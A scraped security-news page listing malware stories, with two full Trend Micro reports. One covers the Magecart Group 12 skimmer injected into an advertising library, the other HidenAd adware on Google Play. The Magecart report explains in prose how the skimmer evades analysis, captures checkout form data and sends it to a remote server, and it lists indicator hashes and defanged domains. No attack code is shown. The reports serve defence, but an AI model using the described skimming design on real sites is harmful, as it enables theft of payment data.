Browsing category

Malware

Android, Android app, Android Malware, Android trojan, Computer Security, Cyber Security News, Evasion technique, Google Play Store, Malware, Security Hacker,

2 Android Apps From Google Play Store Lunching Banking Malware With Sophisticated Evasion Techniques

Researchers discovered 2 Malicious Android apps from Google Play Store that drops the banking malware with highly obfustication techniques.

Researchers discovered 2 Malicious Android apps from Google Play Store that drops Anubis banking malware with highly obfustication techniques. The malicious apps posed as a legitimate tool with the name of Currency Converter and BatterySaverMobi and also attackers posted a fake review and boasted a score of 4.5 stars. Google Play store continuously flooding with […]

The post 2 Android Apps From Google Play Store Lunching Banking Malware With Sophisticated Evasion Techniques appeared first on GBHackers On Security.

Artem Radchenko, Data loss, EDGAR, Electronic Data Gathering Analysis and Retrieval, hacking, indictment, Law & order, Malware, Oleksandr Ieremenko, Phishing, SEC, Securities and Exchange Commission, securities fraud, Security threats, ukraine, wire fraud,

Two charged with hacking company filings out of SEC’s EDGAR system

They’re charged with phishing and inflicting malware to get into the EDGAR filing system, stealing thousands of filings, and selling access.

This post appeared first on Naked Security Blog by Sophos
Author: Lisa Vaas

Backdoor, Banking Trojan, Computer Security, Cryptocurrency hack, Cyber Security News, Malware, Network Security, Ransomware, Security Hacker, spyware, trojan,

A Scary Evolution & Alliance of TrickBot, Emotet and Ryuk Ransomware Attack

Ryuk first appeared in August 2018, and while not incredibly active across the globe, at least three organizations were hit with Ryuk infections over the course of the first two months of its operations, landing the attackers about $640,000 in ransom for their efforts. According to CrowdStrike analysis from late last week, Grim Spider has […]

The post A Scary Evolution & Alliance of TrickBot, Emotet and Ryuk Ransomware Attack appeared first on GBHackers On Security.

Code-Injection, Magecart, Malware, Online Skimming, Social,

New Magecart Attack Delivered Through Compromised Advertising Supply Chain

by Chaoying Liu and Joseph C. Chen

On January 1, we detected a significant increase in activity from one of the web skimmer groups we’ve been tracking. During this time, we found their malicious skimming code (detected by Trend Micro as JS_OBFUS.C.) loaded on 277 e-commerce websites providing ticketing, touring, and flight booking services as well as self-hosted shopping cart websites from prominent cosmetic, healthcare, and apparel brands. Trend Micro’s machine learning and behavioral detection technologies proactively blocked the malicious code at the time of discovery (detected as Downloader.JS.TRX.XXJSE9EFF010).

The activities are unusual, as the group is known for injecting code into a few compromised e-commerce websites then keeping a low profile during our monitoring. Further research into these activities revealed that the skimming code was not directly injected into e-commerce websites, but to a third-party JavaScript library by Adverline, a French online advertising company, which we promptly contacted. Adverline has handled the incident and has immediately carried out the necessary remediation operations in relationship with the CERT La Poste.


Figure 1: Attack chain of the online skimming attack


Figure 2: Timeline of web-skimming activities that accessed malicious (top); and country distribution of where they were accessed, from January 1 to January 6 (bottom)
Note: Data from Trend Micro™Smart Protection Network™

Given the attack’s modus of targeting third-party services, we construed them to be from Magecart Group 5, which RiskIQ reported to be linked to several data breach incidents like the one against Ticketmaster last year. With additional help from security researcher Yonathan Klijnsma at RiskIQ, we determined that these web-skimming activities were carried out by Magecart Group 12, a seemingly new subgroup of Magecart.

Magecart Group 12’s Attack Chain
Unlike other online skimmer groups that directly compromise their target’s shopping cart platforms, Magecart Groups 5 and 12 attack third-party services used by e-commerce websites by injecting skimming code to JavaScript libraries they provide. This enables all websites embedded with the script to load the skimming code. Targeting third-party services also helps expand their reach, allowing them to steal more data.

In Adverline’s case, code was injected into a JavaScript library for retargeting advertising. It’s an approach used by e-commerce websites where visitors are tagged so they can be delivered specific ads that could attract them back to the websites. At the time of our research, the websites embedded with Adverline’s retargeting script loaded Magecart Group 12’s skimming code, which, in turn, skims payment information entered on webpages then sends it to its remote server.


Figure 3: The malicious code injected into compromised e-commerce websites by Magecart Group 12


Figure 4: The injected malicious code in Adverline’s retargeting script, designed to load skimming code (highlighted)

Skimming Toolkit
Magecart Group 12 uses a skimming toolkit that employs two obfuscated scripts. The first script is mostly for anti-reversing while the second script is the main data-skimming code. They also include code integrity checking that detects if the script is modified. The check is done by calculating a hash value to the script section, and stops the execution of the script if it finds that it doesn’t match the original hash.


Figure 5: Snapshot of code from the script of the toolkit responsible for integrity checking (deobfuscated)

The script also constantly cleans the browser debugger console messages to deter detection and analysis. Part of its fingerprinting routine includes checking if the script is running on a mobile device (by checking the browser User-Agent) and if there are handlers that check if the browser debugger is on. The fingerprinting routines are done to confirm that the browser session is from an actual consumer.


Figure 6: Snapshot of code from one of the scripts in the toolkit responsible for fingerprinting (deobfuscated)

Skimming Payment Data
The second script, the main skimming code, first checks if they are executed on a shopping cart website by detecting related strings in the URL like “checkout,” “billing,” and “purchase,” among others. Also of note are the strings “panier,” which means “basket” in French, and “kasse,” or “checkout” in German. Figure 2 shows that most of our detections (accessing Magecart Group 12-controlled domains) were in France, with a noticeable activity in Germany.

If it detects any of the targeted strings in the URL, the script will start to perform the skimming behavior. Once any value instead of empty is entered on the webpage’s typing form, the script will copy both the form name and values keyed in by the user. Stolen payment and billing data is stored in a JavaScript LocalStorage with the key name Cache. The copied data is Base64-encoded. It also generates a random number to specify individual victims, which it reserves into LocalStorage with key name E-tag. A JavaScript event “unload” is triggered whenever the user closes or refreshes the payment webpage. The script then sends the skimmed payment data, the random number (E-tag), and the e-commerce website’s domain to a remote server through HTTP POST, with Base64 coding on the entire sent date.


Figure 7: The main payment data-skimming code used in the attack (deobfuscated)

These attacks further demonstrate the importance of securing the infrastructures used to run websites, applications, or web applications, especially those that store and manage sensitive data. Regularly patch and update software; disable, restrict, or secure outdated components or third-party plugins; and strengthen credentials or authentication mechanisms. IT and security teams should also proactively monitor their websites or applications for signs of malicious activities such as unauthorized access and modification, data exfiltration, and execution of unknown scripts.

RiskIQ’s analysis further sheds light on the correlation of Group 12’s activities to Magecart.

The following Trend Micro solutions, powered by XGen™ security, protect users and businesses by blocking the scripts and preventing access to the malicious domains:

Indicators of Compromise (IoCs):
Skimming script (SHA-256):

  • 56cca56e39431187a2bd95e53eece8f11d3cbe2ea7ee692fa891875f40f233f5
  • f1f905558c1546cd6df67504462f0171f9fca1cfe8b0348940aad78265a5ef73
  • 87ee0ae3abcd8b4880bf48781eba16135ba03392079a8d78a663274fde4060cd
  • 80e40051baae72b37fee49ecc43e8dded645b1baf5ce6166c96a3bcf0c3582ce

Related malicious domains:

  • givemejs[.]cc
  • content-delivery[.]cc
  • cdn-content[.]cc
  • deliveryjs[.]cc

 With additional insights and analysis from Yonathan Klijnsma of RiskIQ

The post New Magecart Attack Delivered Through Compromised Advertising Supply Chain appeared first on .

This post appeared first on Trend Macro Blog
Author: Trend Micro Cyber Safety Solutions Team

Computer Security, Cyber Attack, Cyber Security News, Malware, Ransomware, Security Hacker,

U.S City Del Rio Attacked by Ransomware – All the Operation has been Shut Down

The City of Del Rio IT system was compromised by the Ransomware attack that leads to shut down the regular operation and the servers are disabled. Del Rio is a city in and the county seat of Val Verde County, Texas reported that the powerful Ransomware hit on their IT system. As a precaution step, Management Information Services (MIS) […]

The post U.S City Del Rio Attacked by Ransomware – All the Operation has been Shut Down appeared first on GBHackers On Security.

Backdoor, Computer Security, Cyber Security News, Hacking group, Internet, Malware, RAT, Security Hacker, Spam, Word documents,

TA505 Hacking Group Launching New Malware ServHelper via Weaponized MS Word Documents

TA505 threat actors currently launching new malware campaign with a backdoor capability that mainly target the financial institutions via MS Word Documents. TA505 hacking group already had a record of distributing biggest threat campaign  Dridex and widely distributing Locky ransomware that affected millions of computers around the world. ServHelper backdoor campaign observed in 2018 along with 2 different […]

The post TA505 Hacking Group Launching New Malware ServHelper via Weaponized MS Word Documents appeared first on GBHackers On Security.

adware, Google Play, Malware, Mobile,

Adware Disguised as Game, TV, Remote Control Apps Infect 9 Million Google Play Users

By Ecular Xu

Adware is bothersome, disruptive, and have been around for a long time, but they’re still around. In fact, we recently discovered an active adware family (detected by Trend Micro as AndroidOS_HidenAd) disguised as 85 game, TV, and remote control simulator apps on the Google Play store. This adware is capable of displaying full-screen ads, hiding itself, monitoring a device’s screen unlocking functionality, and running in the mobile device’s background. The 85 fake apps, which have been downloaded a total of 9 million times around the world. After verifying our report, Google swiftly suspended the fake apps from the Play store.

FIGURE 1-A

FIGURE 1-B

Figure 1. A screen capture of some of the adware-laden fake apps on Google Play

The “Easy Universal TV Remote,” which claims to allow users to use their smartphones to control their TV, is the most downloaded among the 85 adware-loaded apps.

FIGURE 2-A

FIGURE 2-B

Figure 2. A screen capture of the Easy Universal TV Remote app and its information

The fake app, which already has been downloaded more than 5 million times, has received multiple complaints on the comment section pertaining to its behaviors.

FIGURE 3

Figure 3. A screen capture of some of the negative reviews left by Easy Universal TV Remote users complaining about the app disappearing, not functioning as advertised, and ad pop-ups

Behavior Analysis

We tested each of the fake apps related to the adware family and discovered that though they come from different makers and have different APK cert public keys, they exhibit similar behaviors and share the same code.

After the adware is downloaded and launched on a mobile device, a full-screen ad initially pops up.

FIGURE 4-A

FIGURE 4-B

FIGURE 4-C

Figure 4. Screenshots of the full-screen ads that pop up on an adware-infected mobile device

Upon closing the first ad, call to action buttons such as “start,” “open app,” or “next,” as well as a banner ad will appear on the mobile device’s screen. Tapping on the call to action button brings up another full-screen ad.

FIGURE 5-A

FIGURE 5B

FIGURE 5-C

Figure 5. Screenshots of the call to action buttons appearing on the device’s screen

FIGURE 6

Figure 6. A screen capture of a full-screen ad that pops up after clicking the call to action button on one of the fake apps

After the user exits the full-screen ad, more buttons that provide app-related options for users appear on the screen. It also prompts the user to give the app a five-star rating on Google Play. If the user clicks on any of the buttons, a full-screen ad will pop up again.

FIGURE 7-A

FIGURE 7-B

FIGURE 7-C

Figure 7. Screenshots of app-related options a user can click on; all of them bring up more pop-up ads

Afterwards, the app informs the user that it is loading or buffering. However, after a few seconds, the app disappears from the user’s screen and hides its icon on the device. The fake app still runs in a device’s background after hiding itself. Though hidden, the adware is configured to show a full-screen ad every 15 or 30 minutes on the user’s device.

FIGURE 8

Figure 8. A screen capture of the fake app taken before it disappears from the device’s screen

FIGURE 9

Figure 9. A screen capture of a code snippet that enables the app to hide itself on a user’s device

Some of the fake apps exhibit another type of ad-showing behavior that monitors user screen unlocking action and shows an ad each time the user unlocks the mobile device’s screen. A receiver module registers in AndroidManifest.xml so that each time a user unlocks the device it will then trigger a full-screen ad pop up.

FIGURE 10

 

Figure 10. A screen capture of an adware-infected device with a fake app that has already hidden itself but is still running in the device’s background

FIGURE 11

Figure 11. A screen capture of a register receiver in AndroidManifest.xml

FIGURE 12

Figure 12. Screen capture of a code snippet that enables the adware to display full-screen ads when a user unlocks the screen of an infected device

FIGURE 13

Figure 13. A screen capture of a full-screen ad displayed after unlocking an infected device’s screen

Trend Micro Solutions

While the fake apps can be removed manually via the phone’s app uninstall feature, it can be difficult to get there when full-screen ads show up every 15 or 30 minutes or each time a user unlocks the device’s screen.

As more and more people become dependent on mobile devices, the need to keep mobile devices safe from a growing number of mobile threats — such as fake apps laced with adware — is all the more pertinent.

Trend Micro customers are protected with multilayered mobile security solutions via Trend Micro™ Mobile Security for Android™ (available on Google Play). Trend Micro™ Mobile Security for Enterprise solutions provide device, compliance, and application management, data protection, and configuration provisioning, as well as protect devices from attacks that exploit vulnerabilities, preventing unauthorized access to apps and detecting and blocking malware and fraudulent websites. Trend Micro™ Mobile App Reputation Service (MARS) covers threats to Android and iOS devices using leading sandbox and machine learning technologies. It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerabilities.

A comprehensive list of the indicators of compromise can be found here.

 

 

The post Adware Disguised as Game, TV, Remote Control Apps Infect 9 Million Google Play Users appeared first on .

This post appeared first on Trend Macro Blog
Author: Trend Micro

Encrypt, Malware, Ransomware, Stealing,

New Malvertising Chain that Steals Confidential Information and Encrypts With GandCrab Ransomware

A new malvertising chain that uses multiple payloads to steal confidential information from the victim’s machine and to encrypt their files with GandCrab Ransomware. Threat actors using the the Fallout exploit kit, a utility program that designedto exploit vulnerabilities in ports, softwares and to deploy backdoors in vulnerable systems. Malwarebytes security researchers observed a threat […]

The post New Malvertising Chain that Steals Confidential Information and Encrypts With GandCrab Ransomware appeared first on GBHackers On Security.

Android, Android Spy app, Android Spyware, Cyber Security News, Google, Google Play Store, Malware, Malware Games, Mobile Attacks, Security Hacker, spyware,

Spyware From Google Play as a Legitimate Android Apps That Infected 196 Country Users

Spyware

Dangerous spyware apps discovered form the Google play store that posed as legitimate apps and almost 100,000 users downloaded and affected these malicious apps from 196 countries. Based on the Current mobile-based attacks, Android Platform is one of the biggest Target for Cyber Criminals to spying and Steal the personal information around the globle. There […]

The post Spyware From Google Play as a Legitimate Android Apps That Infected 196 Country Users appeared first on GBHackers On Security.